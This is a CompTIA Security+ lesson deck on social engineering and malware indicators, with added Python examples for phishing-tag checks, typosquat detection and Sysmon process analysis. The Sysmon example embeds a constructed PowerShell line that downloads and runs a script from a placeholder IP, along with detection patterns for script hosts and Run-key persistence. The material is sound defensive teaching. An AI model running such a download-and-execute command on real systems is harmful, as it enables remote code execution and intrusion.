Identifying Social Engineering and Malware
Lesson 4
Compare and Contrast Social Engineering Techniques
Topic 4A
CompTIA Security+ Lesson 4 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Syllabus Objectives Covered
1.1 Compare and contrast different types of social engineering techniques
Social Engineering
“Hacking the human”
Purposes of social engineering
Reconnaissance and eliciting information
Intrusion and gaining unauthorized access
Many possible scenarios
Persuade a user to run a malicious file
Contact a help desk and solicit information
Gain access to premises and install a monitoring device
Social Engineering Principles
Reasons for effectiveness
Familiarity/liking
Establish trust
Make request seem reasonable and natural
Consensus/social proof
Exploit polite behaviors
Establish spoofed testimonials or contacts
Authority and intimidation
Make the target afraid to refuse
Exploit lack of knowledge or awareness
Scarcity and urgency
Rush the target into a decision
Impersonation and Trust
Impersonation
Pretend to be someone else
Use the persona to charm or to intimidate
Exploit situations where identity-proofing is difficult
Pretexting
Using a scenario with convincing additional detail
Trust
Obtain or spoof data that supports the identity claim
Dumpster Diving and Tailgating
Dumpster diving
Steal documents and media from trash
Tailgating
Access premises covertly
Follow someone else through a door
Piggybacking
Access premises without authorization, but with the knowledge of an employee
Get someone to hold a door open
Identity Fraud and Invoice Scams
Identity fraud
Impersonation with convincing detail and stolen or spoofed proofs
Identity fraud versus identity theft
Invoice scams
Spoofing supplier details to submit invoices with false account details
Credential theft and misuse
Credential harvesting
Shoulder surfing
Lunchtime attack
Phishing, Whaling, and Vishing
Trick target into using a malicious resource
Spoof legitimate communications and sites
Spear phishing
Highly targeted/tailored attack
Whaling
Targeting senior management
Vishing
Using a voice channel
SMiShing
Using text messaging
Spam, Hoaxes, and Prepending
Spam
Unsolicited email
Email address harvesting
Spam over Internet messaging (SPIM)
Hoaxes
Delivered as spam or malvertising
Fake A-V to get user to install remote desktop software
Phone-based scams
Prepending
Tagging email subject line
Can be used by threat actor as a consensus or urgency technique
Can be added by mail systems to warn users
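The two uses of prepending listed above, as an added example that is not part of the CompTIA slides: a small Python model of a mail gateway that prepends a warning tag to external mail, and at the same time flags subjects an attacker has already prepended with a fake reply marker (consensus), urgency wording, or a copy of the gateway's own tag. The internal domain example.com, the [EXTERNAL] tag and the three messages are assumptions constructed for the example.

```python
"""Mail-gateway subject prepending and detection of attacker-prepended tags.

Added example, not CompTIA's own material. The gateway prepends a warning tag to
external mail; the analysis also flags subjects that already carry conversation
markers (RE:/FW:, implying an existing thread), urgency wording, or a spoofed
copy of the gateway's tag. Domains, tags and messages are constructed.
"""
import email
import email.utils
import re
from email import policy

INTERNAL_DOMAINS = {"example.com"}   # assumption: our own mail domains
EXTERNAL_TAG = "[EXTERNAL]"          # assumption: the tag our gateway prepends

# Attacker-style prepends. RE:/FW: fake an existing conversation (consensus);
# the urgency words push the reader to act without thinking.
CONSENSUS_RE = re.compile(r"^\s*(?:re|fw|fwd)\s*:", re.I)
URGENCY_RE = re.compile(r"\b(?:urgent|action required|immediate|final notice)\b", re.I)


def sender_domain(msg):
    """Return the lower-cased domain of the From: header address."""
    _name, addr = email.utils.parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def analyze(raw):
    """Classify one raw RFC 5322 message and produce the subject to deliver."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = str(msg.get("Subject", ""))
    external = sender_domain(msg) not in INTERNAL_DOMAINS

    # Strip any copies of our tag so only the gateway decides whether it appears.
    clean = re.sub(re.escape(EXTERNAL_TAG) + r"\s*", "", subject, flags=re.I).strip()

    findings = []
    # An external sender whose subject already carries our warning tag is trying
    # to make the message look as if it has already been vetted.
    if external and subject.lstrip().upper().startswith(EXTERNAL_TAG):
        findings.append("spoofed_gateway_tag")
    if external and CONSENSUS_RE.match(clean):
        findings.append("fake_reply_prefix")
    if URGENCY_RE.search(clean):
        findings.append("urgency_wording")

    delivered = f"{EXTERNAL_TAG} {clean}" if external else clean
    return {"external": external, "subject": delivered, "findings": findings}


# Constructed sample messages (not real traffic).
SAMPLES = {
    "internal": "From: Alice <alice@example.com>\r\nSubject: Lunch menu\r\n\r\nhi\r\n",
    "vendor": "From: Pat <pat@supplier.test>\r\nSubject: Invoice 4471\r\n\r\nhi\r\n",
    "phish": ("From: CEO <ceo@examp1e.com>\r\n"
              "Subject: [EXTERNAL] RE: URGENT wire transfer\r\n\r\nhi\r\n"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, analyze(raw))
```

The gateway removes any pre-existing copy of its tag before adding its own, so a user always sees exactly one tag and a spoofed one cannot make an external message look internal.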
Pharming and Credential Harvesting
Passive techniques have less risk of detection
Pharming
Redirection by DNS spoofing
Typosquatting
Use cousin domains instead of redirection
Make phishing messages more convincing
Watering hole
Target a third-party site
Customer, supplier, hobbies, social media...
Credential harvesting
Attacks focused on obtaining credentials for sale rather than direct intrusion
Attacks focused on obtaining multiple credentials for single company
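Typosquatting and cousin domains, as an added example that is not part of the CompTIA slides: Python that generates the usual look-alike variants of a protected domain (dropped letter, swapped letters, doubled letter, look-alike character, inserted hyphen, alternate TLD) and flags any DNS query for one of them in a resolver log. The protected domain example.com, the TLD list and the BIND-style query log lines are assumptions constructed for the example; the "last two labels" rule for the registered domain is a simplification noted in the code.

```python
"""Cousin-domain (typosquat) generation and resolver-log matching.

Added example, not CompTIA's own material. The protected domain, the TLD
list and the BIND-style query log lines below are constructed.
"""
import re

PROTECTED = "example.com"                      # assumption: the domain being impersonated
ALT_TLDS = ["net", "org", "co", "cm", "info"]  # assumption: TLDs worth watching
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "m": "rn", "w": "vv"}
# BIND query-log line: "client 10.0.0.5#53211: query: www.example.com IN A + (10.0.0.2)"
QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<qname>[\w.-]+) IN ")


def cousin_domains(domain):
    """Return the set of look-alike domains for one second-level domain."""
    label, _, tld = domain.partition(".")
    labels = set()
    for i in range(len(label)):
        labels.add(label[:i] + label[i + 1:])                  # omission: examle
        labels.add(label[:i] + label[i] * 2 + label[i + 1:])   # repetition: exxample
        if label[i] in HOMOGLYPHS:                              # homoglyph: examp1e
            labels.add(label[:i] + HOMOGLYPHS[label[i]] + label[i + 1:])
    for i in range(len(label) - 1):                             # transposition: exmaple
        labels.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i in range(1, len(label)):                              # hyphenation: exam-ple
        labels.add(label[:i] + "-" + label[i:])
    out = {f"{v}.{tld}" for v in labels}
    out.update(f"{label}.{t}" for t in ALT_TLDS if t != tld)    # alternate TLD: example.co
    out.discard(domain)
    return out


def registered_domain(qname):
    """Last two labels of a query name. Simplification (assumption): a real
    tool would use the Public Suffix List to handle names like example.co.uk."""
    parts = qname.rstrip(".").lower().split(".")
    return ".".join(parts[-2:])


def find_typosquats(log_lines, protected=PROTECTED):
    """Return (client, qname, cousin) for every query that names a cousin domain."""
    suspects = cousin_domains(protected)
    hits = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if m is None:
            continue
        rd = registered_domain(m["qname"])
        if rd in suspects:
            hits.append((m["src"], m["qname"], rd))
    return hits


# Constructed resolver log (no real clients or traffic).
LOG = [
    "client 10.0.0.5#53211: query: www.example.com IN A + (10.0.0.2)",
    "client 10.0.0.7#40012: query: login.examp1e.com IN A + (10.0.0.2)",
    "client 10.0.0.9#51123: query: exmaple.com IN A + (10.0.0.2)",
    "client 10.0.0.9#51124: query: example.cm IN A + (10.0.0.2)",
    "client 10.0.0.11#39001: query: contoso.test IN A + (10.0.0.2)",
]

if __name__ == "__main__":
    for src, qname, cousin in find_typosquats(LOG):
        print(f"{src} looked up {qname} (cousin of {PROTECTED}: {cousin})")
```

The same generated list is what a defender registers or sinkholes pre-emptively; matching it against resolver logs catches users who have already clicked a link in a phishing message that used one of these domains.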
Influence Campaigns
Sophisticated threat actors using multiple resources to change opinions on a mass scale
Soft power
Leveraging diplomatic and cultural assets
Hybrid warfare
Use of espionage, disinformation, and hacking
Social media
Use of hacked accounts and bot accounts
Spread rumor and reinforce messaging
Social Engineering Techniques
Review Activity
Analyze Indicators of Malware-based Attacks
Topic 4B
Syllabus Objectives Covered
1.2 Given a scenario, analyze potential indicators to determine the type of attack
4.1 Given a scenario, use the appropriate tool to assess organizational security (Cuckoo only)
Malware Classification
Classification by vector or infection method
Viruses and worms
Self-replicating code that spreads without authorization
Trojans
A malicious program concealed within a benign one
Potentially unwanted programs/applications (PUPs/PAPs)
Pre-installed “bloatware” or installed alongside another app
Not completely concealed, but installation may be covert
Also called grayware
Classification by payload
Computer Viruses
Rely on some sort of host file or media
Non-resident/file infector
Memory resident
Boot
Script/macro
Multipartite
Polymorphic
Vector for delivery
Screenshot used with permission from Microsoft.
Computer Worms and Fileless Malware
Early computer worms
Propagate in memory/over network links
Consume bandwidth and crash processes
Fileless malware
Exploiting remote execution and memory residence to deliver payloads
May run from an initial script or Trojan
Persistence via the registry
Use of shellcode to create backdoors and download additional tools
“Living off the land” exploitation of built-in scripting tools
Advanced persistent threat (APT)/advanced volatile threat (AVT)/low observable characteristics (LOC)
Spyware, Adware, and Keyloggers
Tracking cookies
Adware (PUP/grayware)
Changes to browser settings
Spyware (malware)
Log all local activity
Use of recording devices and screenshots
Redirection
Keylogger
Software and hardware
Screenshot used with permission from ActualKeylogger.com.
Backdoors and Remote Access Trojans
Backdoor malware
Remote access trojan (RAT)
Bots and botnets
Command & control (C2 or C&C)
Backdoors from misconfiguration and unauthorized software
Screenshot used with permission from Wikimedia Commons by CCAS4.0 International.
Rootkits
Local administrator versus SYSTEM/root privileges
Replace key system files and utilities
Purge log files
Firmware rootkits
Ransomware, Crypto-Malware, and Logic Bombs
Ransomware
Nuisance (lock out user by replacing shell)
Crypto-malware
High impact ransomware (encrypt data files or drives)
Cryptomining/cryptojacking
Hijack resources to mine cryptocurrency
Logic bombs
Image by Wikimedia Commons.
Malware Indicators
Browser changes or overt ransomware notification
Anti-virus notifications
Endpoint protection platforms and next-gen A-V
Behavior-based analysis
Sandbox execution
Cuckoo
Resource utilization/consumption
Task Manager and top
File system changes
Registry
Temp files
Process Analysis
Signature-based detection is failing to identify modern APT-style tools
Network and host behavior anomalies drive detection methods
Running process analysis
Process Explorer
Logging activity
System Monitor
Network activity
Screenshot: Process Explorer docs.microsoft.com/en-us/sysinternals.
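The host-behaviour indicators above (parent/child process anomalies, logging with System Monitor, registry persistence) and the fileless "living off the land" pattern from the Computer Worms and Fileless Malware slide, as one added example that is not part of the CompTIA slides: Python that runs three detections over Sysmon-style events. It flags an Office application spawning a script host, decodes a PowerShell -EncodedCommand payload, and flags a value written under a Run key. The event records, the process IDs, the payload URL and the user profile path are assumptions constructed for the example; field names follow Sysmon Event ID 1 (process create) and Event ID 13 (registry value set).

```python
"""Process-tree and persistence analysis over Sysmon-style events.

Added example, not CompTIA's own material. Every record, PID, path and the
payload below is constructed; field names follow Sysmon Event ID 1 and 13.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_RE = re.compile(r"[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(events, pid):
    """Walk ParentProcessId links, e.g. 'explorer.exe > winword.exe > powershell.exe'."""
    by_pid = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["Image"]))
        parent = by_pid[pid]["ParentProcessId"]
        if parent not in by_pid:           # no create event seen for the root; use ParentImage
            chain.append(basename(by_pid[pid]["ParentImage"]))
        pid = parent
    return " > ".join(reversed(chain))


def analyze_events(events):
    """Return (rule, pid, detail) tuples for every suspicious event."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            img, parent = basename(ev["Image"]), basename(ev["ParentImage"])
            if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
                findings.append(("office_spawns_script_host", ev["ProcessId"],
                                 ancestry(events, ev["ProcessId"])))
            if img in {"powershell.exe", "pwsh.exe"}:
                decoded = decode_encoded_command(ev["CommandLine"])
                if decoded is not None:
                    findings.append(("encoded_powershell", ev["ProcessId"], decoded))
        elif ev["EventID"] == 13 and RUN_KEY_RE.search(ev["TargetObject"]):
            findings.append(("run_key_persistence", ev["ProcessId"], ev["Details"]))
    return findings


# Constructed payload and events (no real malware, hosts or users).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"EventID": 1, "ProcessId": 3900, "ParentProcessId": 1200, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 3900, "Image": WINWORD,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": f'"{WINWORD}" invoice.docm'},
    {"EventID": 1, "ProcessId": 4212, "ParentProcessId": 4100, "Image": POWERSHELL,
     "ParentImage": WINWORD, "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventID": 13, "ProcessId": 4212, "Image": POWERSHELL,
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\pat\AppData\Local\Temp\u.vbs"},
    {"EventID": 1, "ProcessId": 5020, "ParentProcessId": 700, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for rule, pid, detail in analyze_events(EVENTS):
        print(f"{rule:28} pid={pid} {detail}")
```

None of the three rules needs a file hash: the Word-to-PowerShell parent/child relationship, the encoded command line and the Run-key write are all behaviours, which is why they still fire when the payload never touches disk.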
Indicators of Malware-Based Attacks
Review Activity
Assisted Lab
Installing, Using, and Blocking a Malware-based Backdoor
Lab Activity
Applied Lab
Performing Network Reconnaissance and Vulnerability Scanning
Lab Activity
Summary
Lesson 4